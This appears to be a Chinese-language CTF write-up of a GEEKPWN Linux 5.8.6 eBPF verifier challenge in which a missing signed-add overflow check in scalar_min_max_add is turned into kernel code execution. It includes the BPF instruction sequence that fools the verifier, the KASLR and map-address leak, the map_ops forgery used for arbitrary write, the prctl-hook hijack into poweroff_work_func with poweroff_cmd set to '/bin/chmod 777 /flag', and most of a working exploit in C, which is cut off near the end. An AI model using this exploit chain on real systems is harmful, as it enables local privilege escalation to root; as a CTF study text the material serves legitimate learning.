上周参加了酷炫的GEEKPWN大会,比赛时未能解出这道题目,因为是bpf相关的洞,之前也有一点了解,赛后七哥不厌其烦地给我指导,最终成功解出,非常感谢sunichi
师傅的帮助。本文相关文件在这里
附件里贴心地给了source源码和linux-5.8.6的源码,我们拿beyond compare
比较一下两个项目文件夹,可以找到不同的文件,拿vscode比较一下具体的文件,即可看到diff
的结果.可以看到在verifier.c
文件中的scalar_min_max_add
函数中缺失了溢出检查。
具体看一下此处的代码和调用,只跟到check_alu_op
就差不多了,因为之前我们分析bpf漏洞的时候知道核心检查函数do_check
中会调用此函数。因此最后的漏洞调用链为:do_check
->check_alu_op
->adjust_reg_min_max_vals
->adjust_scalar_min_max_vals
->scalar_min_max_add
。
//verifier.c static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { switch (opcode) { case BPF_ADD: ret = sanitize_val_alu(env, insn); if (ret < 0) { verbose(env, "R%d tried to add from different pointers or scalars\n", dst); return ret; } scalar32_min_max_add(dst_reg, &src_reg); scalar_min_max_add(dst_reg, &src_reg); dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off); break; //... } } // static int adjust_reg_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn) { //... return adjust_scalar_min_max_vals(env, insn, dst_reg, *src_reg); } // /* check validity of 32-bit and 64-bit arithmetic operations */ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn) { //... else { /* all other ALU ops: and, sub, xor, add, ... */ if (BPF_SRC(insn->code) == BPF_X) { if (insn->imm != 0 || insn->off != 0) { verbose(env, "BPF_ALU uses reserved fields\n"); return -EINVAL; } /* check src1 operand */ err = check_reg_arg(env, insn->src_reg, SRC_OP); if (err) return err; } else { if (insn->src_reg != BPF_REG_0 || insn->off != 0) { verbose(env, "BPF_ALU uses reserved fields\n"); return -EINVAL; } } /* check src2 operand */ err = check_reg_arg(env, insn->dst_reg, SRC_OP); if (err) return err; if ((opcode == BPF_MOD || opcode == BPF_DIV) && BPF_SRC(insn->code) == BPF_K && insn->imm == 0) { verbose(env, "div by zero\n"); return -EINVAL; } if ((opcode == BPF_LSH || opcode == BPF_RSH || opcode == BPF_ARSH) && BPF_SRC(insn->code) == BPF_K) { int size = BPF_CLASS(insn->code) == BPF_ALU64 ? 64 : 32; if (insn->imm < 0 || insn->imm >= size) { verbose(env, "invalid shift %d\n", insn->imm); return -EINVAL; } } /* check dest operand */ err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK); if (err) return err; return adjust_reg_min_max_vals(env, insn); } }
/*
 * Report whether the signed 64-bit addition a + b overflows.
 *
 * Returns true when the wrapped sum moved in the wrong direction
 * relative to a (up for a negative b, down for a non-negative b).
 */
static bool signed_add_overflows(s64 a, s64 b)
{
	/* Do the add in u64, where overflow is well-defined */
	s64 res = (s64)((u64)a + (u64)b);

	/* adding a negative value must not produce something larger than a */
	if (b < 0)
		return res > a;
	/* adding a non-negative value must not produce something smaller than a */
	return res < a;
}
看到这个洞很容易想到今年pwn2own上的一个ebpf洞,这个洞之前看到了没有分析,比赛的时候又去现学了一下《CVE-2020-8835 pwn2own 2020 ebpf 提权漏洞分析》和《CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析》。简单说,漏洞在于计算tnum的时候使用的是umin_value和umax_value的低32bit,这导致0x100000001和0x1在函数看来是一样的,因此会被verifier认为是1,从而(n&2)>>1
被认为是0,而实际上我们传入n=2,即可得到1,再进行BPF_MUL
计算从而造成越界读写。
借鉴上述漏洞的想法,我们把verifier
作为一个vm的检查,要执行的数据先拿进去检查一遍,在检查过程中smin_val
和smax_val
会进行检查和更新,其范围表示verifier认为的某个寄存器输入的范围。假如我们可以通过一些手段欺骗其认为寄存器范围是一个常数C,后面再通过一些计算(移位,乘除)使寄存器范围变为常数0。0乘以任何数字都是0,所以verifier会认为后续结果恒为0;而实际运行时可以传入非零值得到其他值,这就可以帮助我们进行map的越界读写。
那么这个洞要怎么达到上述效果呢?比赛的时候我一直在尝试用BPF_ALU64_IMM
来进行调整,使其smin_val==smax_val==0
,然而发现要使得a+x==b+x(mod 0x10000000000000000)
,除非a本身==b+0x10000000000000000。这条路并不可行,在参考文章里的核心越界指令是BPF_LDX_MEM(BPF_DW,0,7,0)
,其中r7被越界改为&map_addr-0x110,我们看下BPF_LDX_MEM
这个指令的检查条件,其核心检查函数为__check_mem_access
。可以看到off
需要大于等于0,因此我们必须trick使得smin_val==smax_val==0
。
//verifier.c /* check read/write into memory region (e.g., map value, ringbuf sample, etc) */ static int __check_mem_access(struct bpf_verifier_env *env, int regno, int off, int size, u32 mem_size, bool zero_size_allowed) { bool size_ok = size > 0 || (size == 0 && zero_size_allowed); struct bpf_reg_state *reg; if (off >= 0 && size_ok && (u64)off + size <= mem_size) return 0; reg = &cur_regs(env)[regno]; switch (reg->type) { case PTR_TO_MAP_VALUE: verbose(env, "invalid access to map value, value_size=%d off=%d size=%d\n", mem_size, off, size); break; case PTR_TO_PACKET: case PTR_TO_PACKET_META: case PTR_TO_PACKET_END: verbose(env, "invalid access to packet, off=%d size=%d, R%d(id=%d,off=%d,r=%d)\n", off, size, regno, reg->id, off, mem_size); break; case PTR_TO_MEM: default: verbose(env, "invalid access to memory, mem_size=%u off=%d size=%d\n", mem_size, off, size); } return -EACCES; }
赛后17师傅提示说可以使用BPF_ALU64_REG
来达到我们的目的,我们先来看下smin_val
和smax_val
的初始值S64_MIN
和S64_MAX
。其值分别为0x8000000000000000
和0x7fffffffffffffff
。我们来看下面的一组bpf指令。根据其初始值可以看到r8的smin和smax分别经历了0x8000000000000000->0x8000000000000001->0x4000000000000000->0x8000000000000000->0
以及0x7fffffffffffffff->0x8000000000000000->0x4000000000000000->0x8000000000000000->0
的变化,最终smin==smax==0,这是verifier做出的判断。然而如果我们输入r8==0x100000000
,满足开始的smin和smax条件,实际计算出来的结果却是0x100000000->0x100000001->0x80000000->0x100000000->0x200000000->2->0x110
。二者结果不一致,我们可以绕过检查进行越界读写。
BPF_ALU64_IMM(BPF_ADD,8,1), // r8 += 1
BPF_ALU64_IMM(BPF_RSH,8,1), // r8 >>= 1
BPF_ALU64_IMM(BPF_LSH,8,1), // r8 <<= 1
BPF_ALU64_REG(BPF_ADD,8,8), // r8 += r8 (tracked bounds overflow and wrap to 0)
BPF_ALU64_IMM(BPF_RSH,8,32), // r8 >>= 32 (runtime value is 2 for an input of 0x100000000)
BPF_ALU64_IMM(BPF_MUL,8,0x110/2), // r8 *= 0x88, i.e. 0x110/2 (runtime: 2 * 0x88 = 0x110)
任意读和参考文章的做法一致,我们看下核心的数据结构bpf_array
,其中的value字段对应我们输入map的地址,其-0x110的偏移处保存着array_map_ops
字段,它是一个全局的变量,存储在vmlinux内核文件的data段,通过它可以leak出kaslr的基址,通过wait_list->next
可以泄露出map的地址。在de4dcr0w
师傅的文章中,其构造了任意读来获取cred的地址,这里因为我没有起root shell所以就只泄露了这两个地址。
gef➤ p/a *(struct bpf_array*) 0xffff888005840000 $1 = { map = { ops = 0xffffffff82016880 <array_map_ops>, inner_map_meta = 0x0 <fixed_percpu_data>, security = 0xffff88800679df00, map_type = 0x2 <fixed_percpu_data+2>, key_size = 0x4 <fixed_percpu_data+4>, value_size = 0x2000 <irq_stack_backing_store>, max_entries = 0x1 <fixed_percpu_data+1>, map_flags = 0x0 <fixed_percpu_data>, spin_lock_off = 0xffffffffffffffea, id = 0x4 <fixed_percpu_data+4>, numa_node = 0xffffffffffffffff, btf_key_type_id = 0x0 <fixed_percpu_data>, btf_value_type_id = 0x0 <fixed_percpu_data>, btf = 0x0 <fixed_percpu_data>, memory = { pages = 0x3 <fixed_percpu_data+3>, user = 0xffff8880067de300 }, name = {0x0 <fixed_percpu_data> <repeats 16 times>}, btf_vmlinux_value_type_id = 0x0 <fixed_percpu_data>, bypass_spec_v1 = 0x0 <fixed_percpu_data>, frozen = 0x0 <fixed_percpu_data>, refcnt = { counter = 0x2 <fixed_percpu_data+2> }, usercnt = { counter = 0x1 <fixed_percpu_data+1> }, work = { data = { counter = 0x0 <fixed_percpu_data> }, entry = { next = 0x0 <fixed_percpu_data>, prev = 0x0 <fixed_percpu_data> }, func = 0x0 <fixed_percpu_data> }, freeze_mutex = { owner = { counter = 0x0 <fixed_percpu_data> }, wait_lock = { { rlock = { raw_lock = { { val = { counter = 0x0 <fixed_percpu_data> }, { locked = 0x0 <fixed_percpu_data>, pending = 0x0 <fixed_percpu_data> }, { locked_pending = 0x0 <fixed_percpu_data>, tail = 0x0 <fixed_percpu_data> } } } } } }, osq = { tail = { counter = 0x0 <fixed_percpu_data> } }, wait_list = { next = 0xffff8880058400c0, prev = 0xffff8880058400c0 } }, writecnt = 0x0 <fixed_percpu_data> }, elem_size = 0x2000 <irq_stack_backing_store>, index_mask = 0x0 <fixed_percpu_data>, aux = 0x0 <fixed_percpu_data>, { value = 0xffff888005840110,//这里是map_element的地址 ptrs = 0xffff888005840110, pptrs = 0xffff888005840110 } }
任意地址写的利用链依然是参照rtfingc
师傅的做法,首先看一下array_map_ops
成员,我们可以通过地址越界写覆写array_map_ops成员为map_element_addr
,从而伪造map_ops。
gef➤ p/a *(struct bpf_map_ops *) 0xffffffff82016880 $2 = { map_alloc_check = 0xffffffff81162ef0 <array_map_alloc_check>, map_alloc = 0xffffffff81163df0 <array_map_alloc>, map_release = 0x0 <fixed_percpu_data>, map_free = 0xffffffff811636c0 <array_map_free>, map_get_next_key = 0xffffffff81162fe0 <array_map_get_next_key>, map_release_uref = 0x0 <fixed_percpu_data>, map_lookup_elem_sys_only = 0x0 <fixed_percpu_data>, map_lookup_batch = 0xffffffff81149240 <generic_map_lookup_batch>, map_lookup_and_delete_batch = 0x0 <fixed_percpu_data>, map_update_batch = 0xffffffff81149020 <generic_map_update_batch>, map_delete_batch = 0x0 <fixed_percpu_data>, map_lookup_elem = 0xffffffff81163060 <array_map_lookup_elem>, map_update_elem = 0xffffffff811635b0 <array_map_update_elem>, map_delete_elem = 0xffffffff81163010 <array_map_delete_elem>, map_push_elem = 0x0 <fixed_percpu_data>, map_pop_elem = 0x0 <fixed_percpu_data>, map_peek_elem = 0x0 <fixed_percpu_data>, map_fd_get_ptr = 0x0 <fixed_percpu_data>, map_fd_put_ptr = 0x0 <fixed_percpu_data>, map_gen_lookup = 0xffffffff81163310 <array_map_gen_lookup>, map_fd_sys_lookup_elem = 0x0 <fixed_percpu_data>, map_seq_show_elem = 0xffffffff81163140 <array_map_seq_show_elem>, map_check_btf = 0xffffffff81163c60 <array_map_check_btf>, map_poke_track = 0x0 <fixed_percpu_data>, map_poke_untrack = 0x0 <fixed_percpu_data>, map_poke_run = 0x0 <fixed_percpu_data>, map_direct_value_addr = 0xffffffff81162f70 <array_map_direct_value_addr>, map_direct_value_meta = 0xffffffff81162fa0 <array_map_direct_value_meta>, map_mmap = 0xffffffff811630e0 <array_map_mmap>, map_poll = 0x0 <fixed_percpu_data> }
我们将map_push_elem
改为map_get_next_key
,在调用map_update_elem
的时候会调用map_push_elem
,但是需要map的类型为BPF_MAP_TYPE_QUEUE
或者BPF_MAP_TYPE_STACK
。
看一下调用链,map_update_elem函数中的bpf_map_update_value(map, f, key, value, attr->flags);
调用bpf_map_update_value函数的map->ops->map_push_elem(map, value, flags);
,最终调用了array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
。其中key
对应value
,next_key
对应attr->flags
。
最终当index < array->map.max_entries - 1
时,有*next = index + 1;
,即*(attr->flags)=*(u32 *)value+1
。因为是无符号数比较,我们利用越界写提前布置array->map.max_entries=-1;map_type=BPF_MAP_TYPE_STACK
即可进行地址任意写。
/*
 * BPF_MAP_UPDATE_ELEM handler: copies the key and value in from user
 * space, then hands them, together with attr->flags, to
 * bpf_map_update_value().
 */
static int map_update_elem(union bpf_attr *attr)
{
	void __user *ukey = u64_to_user_ptr(attr->key);
	void __user *uvalue = u64_to_user_ptr(attr->value);
	int ufd = attr->map_fd;
	struct bpf_map *map;
	void *key, *value;
	u32 value_size;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM))
		return -EINVAL;

	f = fdget(ufd);
	map = __bpf_map_get(f);
	if (IS_ERR(map))
		return PTR_ERR(map);
	if (!(map_get_sys_perms(map, f) & FMODE_CAN_WRITE)) {
		err = -EPERM;
		goto err_put;
	}

	if ((attr->flags & BPF_F_LOCK) &&
	    !map_value_has_spin_lock(map)) {
		err = -EINVAL;
		goto err_put;
	}

	key = __bpf_copy_key(ukey, map->key_size);
	if (IS_ERR(key)) {
		err = PTR_ERR(key);
		goto err_put;
	}

	/* per-CPU map types take one 8-byte-rounded value per possible CPU */
	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY ||
	    map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE)
		value_size = round_up(map->value_size, 8) * num_possible_cpus();
	else
		value_size = map->value_size;

	err = -ENOMEM;
	value = kmalloc(value_size, GFP_USER | __GFP_NOWARN);
	if (!value)
		goto free_key;

	err = -EFAULT;
	if (copy_from_user(value, uvalue, value_size) != 0)
		goto free_value;

	/* <-- call site of interest: attr->flags is forwarded unchanged */
	err = bpf_map_update_value(map, f, key, value, attr->flags);

free_value:
	kfree(value);
free_key:
	kfree(key);
err_put:
	fdput(f);
	return err;
}

/*
 * Dispatches the update according to map->map_type. For
 * BPF_MAP_TYPE_QUEUE / BPF_MAP_TYPE_STACK it calls
 * map->ops->map_push_elem(map, value, flags) rather than map_update_elem.
 */
static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key,
				void *value, __u64 flags)
{
	int err;

	/* Need to create a kthread, thus must support schedule */
	if (bpf_map_is_dev_bound(map)) {
		return bpf_map_offload_update_elem(map, key, value, flags);
	} else if (map->map_type == BPF_MAP_TYPE_CPUMAP ||
		   map->map_type == BPF_MAP_TYPE_SOCKHASH ||
		   map->map_type == BPF_MAP_TYPE_SOCKMAP ||
		   map->map_type == BPF_MAP_TYPE_STRUCT_OPS) {
		return map->ops->map_update_elem(map, key, value, flags);
	} else if (IS_FD_PROG_ARRAY(map)) {
		return bpf_fd_array_map_update_elem(map, f.file, key, value,
						    flags);
	}

	bpf_disable_instrumentation();
	if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH ||
	    map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) {
		err = bpf_percpu_hash_update(map, key, value, flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) {
		err = bpf_percpu_array_update(map, key, value, flags);
	} else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) {
		err = bpf_percpu_cgroup_storage_update(map, key, value,
						       flags);
	} else if (IS_FD_ARRAY(map)) {
		rcu_read_lock();
		err = bpf_fd_array_map_update_elem(map, f.file, key, value,
						   flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) {
		rcu_read_lock();
		err = bpf_fd_htab_map_update_elem(map, f.file, key, value,
						  flags);
		rcu_read_unlock();
	} else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) {
		/* rcu_read_lock() is not needed */
		err = bpf_fd_reuseport_array_update_elem(map, key, value,
							 flags);
	} else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
		   map->map_type == BPF_MAP_TYPE_STACK) {
		/* <-- call site of interest: key is not passed on this path */
		err = map->ops->map_push_elem(map, value, flags);
	} else {
		rcu_read_lock();
		err = map->ops->map_update_elem(map, key, value, flags);
		rcu_read_unlock();
	}
	bpf_enable_instrumentation();
	maybe_wait_bpf_programs(map);

	return err;
}

/* Called from syscall */
/*
 * Stores through next_key the index that follows *key:
 *   - key is NULL or *key >= max_entries: *next_key = 0, returns 0
 *   - *key == max_entries - 1: returns -ENOENT, nothing is written
 *   - otherwise: *next_key = *key + 1, returns 0
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = key ? *(u32 *)key : U32_MAX;
	u32 *next = (u32 *)next_key;

	/* unsigned comparison against max_entries */
	if (index >= array->map.max_entries) {
		*next = 0;
		return 0;
	}

	if (index == array->map.max_entries - 1)
		return -ENOENT;

	*next = index + 1;
	return 0;
}
原本想劫持modprobe_path来进行任意命令执行,不过搜索之后未能发现,因此换成prctl函数劫持控制流的方式。我们在sys.c里可以看到prctl
系统调用的实现,内部调用了security_task_prctl
。在security.c中可以看到其函数实现,核心是调用hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);
这个函数指针我们可以写个prctl调用的demo调试看到,其位置为0xffffffff824b3f88+0x18
。因为这里是可写的data段,我们可以将其改成任意的函数指针并在调用prctl时触发控制流劫持。
.data:FFFFFFFF824B3D80 capability_hooks security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.capable-7D4679C0h, <\
.data:FFFFFFFF824B3D80 offset cap_capable-7EC76180h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.settime-7D4679A0h, <\
.data:FFFFFFFF824B3D80 offset cap_settime-7EC763C0h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.ptrace_access_check-7D4679E0h,\
.data:FFFFFFFF824B3D80 <offset cap_ptrace_access_check-7EC75AD0h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.ptrace_traceme-7D4679D8h,\
.data:FFFFFFFF824B3D80 <offset cap_ptrace_traceme-7EC75B60h>, 0>
/*
 * prctl(2) entry point (excerpt). The security hook runs first; any
 * result other than -ENOSYS is returned to the caller immediately.
 */
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
		unsigned long, arg4, unsigned long, arg5)
{
	struct task_struct *me = current;
	unsigned char comm[sizeof(me->comm)];
	long error;

	error = security_task_prctl(option, arg2, arg3, arg4, arg5);
	if (error != -ENOSYS)
		return error;

	error = 0;
	/* ... remainder of the syscall elided in this excerpt ... */
}

/*
 * Calls every task_prctl hook registered on security_hook_heads.task_prctl
 * with the five prctl arguments. The first non-default result is recorded
 * in rc, and the walk stops as soon as a hook returns a non-zero,
 * non-default value.
 */
int security_task_prctl(int option, unsigned long arg2, unsigned long arg3,
			 unsigned long arg4, unsigned long arg5)
{
	int thisrc;
	int rc = LSM_RET_DEFAULT(task_prctl);
	struct security_hook_list *hp;

	hlist_for_each_entry(hp, &security_hook_heads.task_prctl, list) {
		/* indirect call through the hook's function pointer */
		thisrc = hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);
		if (thisrc != LSM_RET_DEFAULT(task_prctl)) {
			rc = thisrc;
			if (thisrc != 0)
				break;
		}
	}
	return rc;
}
函数的第一个参数option是一个32位的int变量,因此在64位下我们无法完全控制第一个参数(传不进完整的64位地址),于是选择把该函数指针劫持为poweroff_work_func
函数地址,并将poweroff_cmd
改为要执行的命令。
这条攻击链如下,poweroff_work_func->run_cmd(poweroff_cmd)->call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC)->call_usermodehelper_exec(info, wait)
。最终可以以root权限启动一个用户态的程序。
我们这里选择将poweroff_cmd
覆写为/bin/chmod 777 /flag
,之后用户态下查看即可
/* Work callback: runs __orderly_poweroff() with the poweroff_force flag. */
static void poweroff_work_func(struct work_struct *work)
{
	__orderly_poweroff(poweroff_force);
}

/*
 * Runs the command stored in poweroff_cmd. If that fails and force is
 * set, syncs and powers the machine off directly. Returns run_cmd()'s
 * result.
 */
static int __orderly_poweroff(bool force)
{
	int ret;

	ret = run_cmd(poweroff_cmd);	/* <-- call site of interest */

	if (ret && force) {
		pr_warn("Failed to start orderly shutdown: forcing the issue\n");

		/*
		 * I guess this should try to kick off some daemon to sync and
		 * poweroff asap.  Or not even bother syncing if we're doing an
		 * emergency shutdown?
		 */
		emergency_sync();
		kernel_power_off();
	}

	return ret;
}

/* Writable command line handed to run_cmd() by __orderly_poweroff(). */
char poweroff_cmd[POWEROFF_CMD_PATH_LEN] = "/sbin/poweroff";
static const char reboot_cmd[] = "/sbin/reboot";

/*
 * Splits cmd into an argv vector and launches argv[0] through
 * call_usermodehelper() with a fixed HOME/PATH environment. Returns
 * -ENOMEM if the split fails, otherwise call_usermodehelper()'s result.
 */
static int run_cmd(const char *cmd)
{
	char **argv;
	static char *envp[] = {
		"HOME=/",
		"PATH=/sbin:/bin:/usr/sbin:/usr/bin",
		NULL
	};
	int ret;

	argv = argv_split(GFP_KERNEL, cmd, NULL);
	if (argv) {
		/* <-- call site of interest */
		ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
		argv_free(argv);
	} else {
		ret = -ENOMEM;
	}

	return ret;
}

/**
 * call_usermodehelper() - prepare and start a usermode application
 * @path: path to usermode executable
 * @argv: arg vector for process
 * @envp: environment for process
 * @wait: wait for the application to finish and return status.
 *        when UMH_NO_WAIT don't wait at all, but you get no useful error back
 *        when the program couldn't be exec'ed. This makes it safe to call
 *        from interrupt context.
 *
 * This function is the equivalent to use call_usermodehelper_setup() and
 * call_usermodehelper_exec().
 */
int call_usermodehelper(const char *path, char **argv, char **envp, int wait)
{
	struct subprocess_info *info;
	gfp_t gfp_mask = (wait == UMH_NO_WAIT) ? GFP_ATOMIC : GFP_KERNEL;

	info = call_usermodehelper_setup(path, argv, envp, gfp_mask,
					 NULL, NULL, NULL);
	if (info == NULL)
		return -ENOMEM;

	return call_usermodehelper_exec(info, wait);
}
题目给的vmlinux是无符号的,调试起来非常费劲,因此我拿源码自己编译了一个带符号的,这样可以源码调试,因为编译的问题有一些函数会内联进去,IDA中搜符号搜不到,调试的时候如果搜不到,可以找上层调用函数,再自己去定位。
/*
 * Proof-of-concept for the CTF kernel discussed in this write-up.
 * Every kernel address and structure offset below is hard-coded for that
 * specific challenge build.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <errno.h>
#include <sys/prctl.h>
#include "linux/bpf.h"
#include "bpf_insn.h"

#define LOG_BUF_SIZE 65535

/*
 * Look up element idx of the map whose fd was loaded into r9 and load its
 * first 8 bytes into register dst; the program exits if the lookup
 * returns NULL. r0 holds the element pointer afterwards.
 */
#define BPF_MAP_GET(idx, dst)                                                        \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
    BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
    BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */

/* Same lookup as BPF_MAP_GET, but dst receives the element pointer itself. */
#define BPF_MAP_GET_ADDR(idx, dst)                                                   \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
    BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
    BPF_MOV64_REG((dst), BPF_REG_0)                   /* r_dst = (r0)           */

int ctrlmapfd, expmapfd;   /* control map and target map fds */
int progfd;                /* loaded BPF program fd */
int sockets[2];            /* socketpair; the program is attached to sockets[1] */
char bpf_log_buf[LOG_BUF_SIZE];

/* Unused helper (its only call, in init(), is commented out): writes two files under /tmp. */
void gen_fake_elf(){
    system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag\n' > /tmp/chmod");
    system("chmod +x /tmp/chmod");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake");
    system("chmod +x /tmp/fake");
}

/* Disable stdio buffering on stdin and stdout. */
void init(){
    setbuf(stdin,0);
    setbuf(stdout,0);
    //gen_fake_elf();
}

/* Print num 64-bit words of buf in hex, two per output line. */
void x64dump(char *buf,uint32_t num){
    uint64_t *buf64 = (uint64_t *)buf;
    printf("[-x64dump-] start : \n");
    for(int i=0;i<num;i++){
        if(i%2==0 && i!=0){
            printf("\n");
        }
        printf("0x%016lx ",*(buf64+i));
    }
    printf("\n[-x64dump-] end ... \n");
}

/* Print a tagged 64-bit value in hex. */
void loglx(char *tag,uint64_t num){
    printf("[lx] ");
    printf(" %-20s ",tag);
    printf(": %-#16lx\n",num);
}

static int bpf_prog_load(enum bpf_prog_type prog_type,
        const struct bpf_insn *insns, int prog_len,
        const char *license, int kern_version);
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
        int max_entries);
static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags);
static int bpf_lookup_elem(int fd,void *key, void *value);
static void writemsg(void);
/* NOTE(review): identifiers beginning with "__" are reserved for the implementation. */
static void __exit(char *err);

/*
 * BPF program attached as a socket filter.
 * NOTE(review): the map fds 3 and 4 are hard-coded here; this assumes
 * bpf_create_map() in prep() returned exactly those values.
 * Offsets 0x18 / 0x24 / 0x2c presumably correspond to map_type,
 * max_entries and spin_lock_off in the struct dump shown in the article —
 * confirm against the target build.
 */
struct bpf_insn insns[]={
    BPF_LD_MAP_FD(1,3),
    BPF_LD_MAP_FD(9,3),                 // r9 = ctrl map fd
    BPF_MAP_GET(0,8),                   // r8 = ctrl_map[0] (u64), r0 = &ctrl_map[0]
    BPF_MOV64_REG(6,0),                 // r6 = &ctrl_map[0]
    BPF_ALU64_IMM(BPF_ADD,8,1),         // r8 += 1
    BPF_ALU64_IMM(BPF_RSH,8,1),         // r8 >>= 1
    BPF_ALU64_IMM(BPF_LSH,8,1),         // r8 <<= 1
    BPF_ALU64_REG(BPF_ADD,8,8),         // r8 += r8
    BPF_ALU64_IMM(BPF_RSH,8,32),        // r8 >>= 32
    BPF_ALU64_IMM(BPF_MUL,8,0x110/2),   // r8 *= 0x88 (0x110/2); 0x110 at runtime when r8 == 2
    BPF_LD_MAP_FD(9,4),                 // r9 = exp map fd
    BPF_MAP_GET_ADDR(0,7),              // r7 = &exp_map[0]
    BPF_ALU64_REG(BPF_SUB,7,8),         // r7 -= r8
    BPF_LDX_MEM(BPF_DW,0,7,0),          // r0 = *(u64 *)(r7 + 0)
    BPF_STX_MEM(BPF_DW,6,0,0x10),       // ctrl_map[2] = r0   (*(u64 *)(r6 + 0x10))
    BPF_LDX_MEM(BPF_DW,0,7,0xc8),       // r0 = *(u64 *)(r7 + 0xc8)
    BPF_STX_MEM(BPF_DW,6,0,0x18),       // ctrl_map[3] = r0   (*(u64 *)(r6 + 0x18))
    BPF_ALU64_IMM(BPF_ADD,0,0x50),      // r0 += 0x50 => element_addr
    BPF_LDX_MEM(BPF_DW,8,6,8),          // r8 = ctrl_map[1]   (*(u64 *)(r6 + 8))
    BPF_JMP_IMM(BPF_JNE,8,0x2,4),       // skip the four stores below unless ctrl_map[1] == 2
    BPF_STX_MEM(BPF_DW,7,0,0),          // *(u64 *)(r7 + 0) = r0 = element_addr
    BPF_ST_MEM(BPF_W,7,0x18,BPF_MAP_TYPE_STACK), // *(u32 *)(r7 + 0x18) = BPF_MAP_TYPE_STACK
    BPF_ST_MEM(BPF_W,7,0x24,-1),        // *(u32 *)(r7 + 0x24) = -1   (max_entries)
    BPF_ST_MEM(BPF_W,7,0x2c,0),         // *(u32 *)(r7 + 0x2c) = 0    (spin_lock_off)
    // exit
    BPF_ALU64_IMM(BPF_MOV,0,0),         // r0 = 0
    BPF_EXIT_INSN(),
};

/*
 * Create both array maps, load the program and attach it to one end of a
 * socketpair. Any failure terminates the process through __exit().
 */
void prep(){
    ctrlmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x100,0x1);
    if(ctrlmapfd<0){ __exit(strerror(errno));}
    expmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x2000,0x1);
    if(expmapfd<0){ __exit(strerror(errno));}
    printf("ctrlmapfd: %d, expmapfd: %d \n",ctrlmapfd,expmapfd);

    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            insns, sizeof(insns), "GPL", 0);
    if(progfd < 0){ __exit(strerror(errno));}

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        __exit(strerror(errno));
    }
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
        __exit(strerror(errno));
    }
}

/*
 * Main sequence: run the program once to read two values back through the
 * control map, run it again with ctrl_map[1] == 2, then issue a series of
 * map updates whose flags argument carries a kernel address, and finally
